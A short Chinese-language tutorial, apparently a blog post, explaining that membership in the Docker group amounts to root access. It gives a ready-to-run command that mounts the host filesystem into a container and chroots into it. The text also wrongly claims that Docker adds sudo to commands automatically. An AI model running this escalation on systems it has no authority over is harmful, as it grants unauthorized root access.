docker用户组提权

关于docker提权

如果一个服务器有一个普通的用户，并且这个用户加入了docker组，则这个用户已经是root了。下面看具体操作

我创了一个用户，并且加入了docker组。

docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因，Docker 给予所有 docker 组的用户相当大的权力（虽然权力只体现在能访问 /var/run/docker.sock 上面）。

默认情况下，Docker 软件包是会默认添加一个 docker 用户组的。Docker 守护进程会允许 root 用户和 docker
组用户访问 Docker。给用户提供 Docker 权限和给用户无需认证便可以随便获取的 root 权限差别不大。

普通用户执行这条命令就可以获得root权限

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

分析

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

参数 -v 将容器外部的目录 / 挂载到容器内部 /hostOS

这个容器的启动脚本是 exploit.sh，主要内容是：chroot 到容器的 /hostOS （也就是宿主机的 /），然后获取到宿主机的 root 权限。

参考：openskill./article/21